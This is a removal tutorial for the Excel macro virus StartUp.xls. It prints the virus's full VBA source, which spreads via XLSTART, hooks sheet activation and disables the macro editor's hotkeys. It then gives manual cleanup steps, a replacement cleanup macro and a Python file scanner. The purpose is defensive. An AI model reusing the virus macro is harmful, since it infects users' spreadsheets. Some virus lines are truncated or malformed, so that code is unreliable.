
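Removing a Macro Virus

How to remove the macro virus named StartUp.xls
--大白菜
The pictures in this article are small and hard to read. As a shortcut, hold Ctrl and scroll the mouse wheel up to zoom in Word so the pictures become legible.
The virus sample follows. (This is the macro virus code. If you are not comfortable with computers, do not tamper with it, or you may make things worse.)
VBA code
=================Macro virus code: copy starts on the next line=================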
Sub auto_open()
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath And
Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
Application.ScreenUpdating = False
ThisWorkbook.Sheets("StartUp").Copy
ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
n$ =
ActiveWindow.Visible = False
Workbooks("StartUp.xls").Save
Workbooks(n$).Close (False)
End If
Application.OnSheetActivate = "StartUp.xls!cop"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub
Sub cop()
On Error Resume Next
If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
Application.ScreenUpdating = False
n$ =
Workbooks("StartUp.xls").Sheets("StartUp").Copy
before:=Worksheets(1)
Sheets(n$).Select
End If
End Sub
Sub back()
On Error Resume Next
Application.OnKey "%{F8}", "StartUp.xls!escape"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnSheetActivate = "StartUp.xls!cop"
Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!cop" Workbooks.Open Application.StartupPath & "\StartUp.xls"
End Sub
Sub escape()
On Error Resume Next
Application.OnSheetActivate = "StartUp.xls!back"
Application.OnKey "%{F11}"
Application.OnKey "%{F8}"
Application.SendKeys "%{F11}"
Application.SendKeys "%{F8}"
For Each book In Workbooks
Application.DisplayAlerts = False
If book "StartUp.xls" Then book.Sheets("StartUp").Delete
Next
For Each book In Workbooks
If = "StartUp.xls" Then
book.Close
End If
Next
End Sub
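=================Macro virus code: copy ends on the previous line=================
To work out the procedure, I ran the virus source code myself and then used the following method. It removes the virus, and it also cleans an infected file once that file has been modified and saved. (Some people online say that cleaning directly with 360 or Kaspersky leaves the file unable to open.)
Note: if you cannot find the path, it is because drive C is the system drive and those are system files, which are hidden. See:
/xiaolincc26/blog/item/2c524d4be7757c2d08f7ef35.html
Steps:
I. Delete Excel11.xls
File location:
C:\Documents and Settings\Administrator\Application Data\Microsoft\Excel\Excel11.xls
Excel recreates this file automatically after it is deleted.
II. Delete StartUp.xls
File location:
C:\Documents and Settings\Administrator\Application Data\Microsoft\Excel\XLSTART\StartUp.xls
II. Create a new, empty StartUp.xls, then use Tools -> Macro -> Record Macro (record anything; the only purpose is to be able to open the VBA editor).
The following is the VBA editor (ordinary users do not need to know about it; a Baidu search will find it,
/view/88461.htm). This picture is not part of the steps; it is only for background.
Step 2:
1. Create a new Excel file:
2. Rename it to StartUp.xls
III. Under Tools -> Macro -> Macros, select the macro you just recorded, choose Edit, select all of its contents, and replace them with the following:
Step 3:
1. Open the newly created Excel file, StartUp.xls
2. Start recording a macro: Tools -> Macro -> Record Macro,
then click OK in the dialog shown in the picture above,
3. Open the macro list: Tools -> Macro -> Macros,
4. Click the Edit button,
5. Copy the VBA code (note the start and end markers) into the editing area, overwriting the existing contents,
VBA code
============Copy starts on the next line (begins with Sub auto_open())=============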
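Sub auto_open()
    ' Runs when this replacement StartUp.xls is loaded by Excel.
    On Error Resume Next
    Application.ScreenUpdating = False
    ActiveWindow.Visible = False
    ' The right-hand side of this assignment is missing in the source text.
    ' ActiveWorkbook.Name is assumed here, because n$ is used as a workbook
    ' name on the next line.
    n$ = ActiveWorkbook.Name
    Workbooks(n$).Close (False)
    ' Run cop every time a sheet is activated.
    Application.OnSheetActivate = "StartUp.xls!cop"
End Sub

Sub cop()
    On Error Resume Next
    Dim VBC As Object
    Dim Name As String
    'Dim delComponent As VBComponent
    Name = "StartUp"
    ' Remove the component named "StartUp" from every open workbook.
    For Each book In Workbooks
        Set delComponent = book.VBAProject.VBComponents(Name)
        book.VBAProject.VBComponents.Remove delComponent
    Next
End Sub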
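============Copy ends on the previous line (ends with End Sub)=============
6. When closing, save StartUp.xls
IV. Save, then open the infected document again, modify it, and save it. This removes the virus from the infected document.

V. Finally, set macro security: set the security level to Medium or higher.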
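
To check every user profile for the two files named in steps I and II, the following added example (not part of the original article) walks a profiles folder and reports each copy it finds. The `AppData\Roaming` layout, the function names and the default root are assumptions added here. A hit on StartUp.xls only shows that the file exists; it can equally be the clean replacement built in the steps above.

```python
import os
import sys

# Excel directory inside a user profile, as path components. The first is the
# Windows XP layout used in the steps above; the second (Vista and later) is
# an assumption added here to generalize the check.
EXCEL_DIRS = (
    ("Application Data", "Microsoft", "Excel"),
    ("AppData", "Roaming", "Microsoft", "Excel"),
)
# Files named in steps I and II, relative to the Excel directory.
TARGETS = (
    (("Excel11.xls",), "step I"),
    (("XLSTART", "StartUp.xls"), "step II"),
)

def find_ci(parent, parts):
    """Resolve parts under parent, matching each component case-insensitively."""
    current = parent
    for part in parts:
        try:
            entries = os.listdir(current)
        except OSError:  # missing, not a directory, or access denied
            return None
        match = next((e for e in entries if e.lower() == part.lower()), None)
        if match is None:
            return None
        current = os.path.join(current, match)
    return current

def scan_profiles(profiles_root):
    """Return (profile, step, path) for each target file under profiles_root."""
    hits = []
    for profile in sorted(os.listdir(profiles_root)):
        base = os.path.join(profiles_root, profile)
        for excel_dir in EXCEL_DIRS:
            for parts, step in TARGETS:
                path = find_ci(base, excel_dir + parts)
                if path and os.path.isfile(path):
                    hits.append((profile, step, path))
    return hits

if __name__ == "__main__":
    # Default root is the XP profiles folder from the article's paths.
    root = sys.argv[1] if len(sys.argv) > 1 else r"C:\Documents and Settings"
    for profile, step, path in scan_profiles(root):
        print(f"{profile}: found file from {step}: {path}")
```
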
